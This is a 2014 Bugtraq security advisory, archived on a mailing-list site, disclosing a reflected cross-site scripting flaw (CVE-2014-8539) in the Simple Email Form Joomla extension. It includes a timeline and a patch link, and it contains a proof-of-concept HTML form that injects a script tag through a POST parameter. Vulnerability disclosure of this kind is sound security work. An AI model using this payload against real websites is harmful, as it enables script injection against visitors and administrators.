lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 19 Nov 2014 11:27:50 +0100 (CET)
From: High-Tech Bridge Security Research <advisory@...ridge.com>
To: bugtraq@...urityfocus.com
Subject: Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla
 Extension

Advisory ID: HTB23241
Product: Simple Email Form Joomla Extension
Vendor: Doug Bierer
Vulnerable Version(s): 1.8.5 and probably prior
Tested Version: 1.8.5
Advisory Publication:  October 29, 2014  [without technical details]
Vendor Notification: October 29, 2014 
Public Disclosure: November 19, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8539
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Simple Email Form Joomla Extension, which can be exploited to perform Cross-Site Scripting (XSS) attacks against visitors and administrators of Joomla websites with installed plugin.


1) Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension: CVE-2014-8539

Input passed via the "mod_simpleemailform_field2_1" HTTP POST parameter to "/index.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:


<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="mod_simpleemailform_field1_1" value="email@...il.com">
<input type="hidden" name="mod_simpleemailform_field2_1" value='"><script>alert("immuniweb");</script>'>
<input type="hidden" name="mod_simpleemailform_submit_1" value="Submit">
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2014-10-29 Vendor Alerted via emails.
2014-11-06 Vendor Alerted via emails.
2014-11-14 Fix Requested via emails.
2014-11-17 Fix Requested via emails.
2014-11-19 Public disclosure with self-written patch.

Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23241-patch.zip

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23241 - https://www.htbridge.com/advisory/HTB23241 - Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension.
[2] Simple Email Form Joomla Extension - http://extensions.joomla.org/extensions/contacts-and-feedback/contact-forms/11494 - Lightweight email contact form with 8 configurable fields, plus a field for uploading attachments to the email, and a CAPTCHA based in Text_CAPTCHA from the PEAR library (included).
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ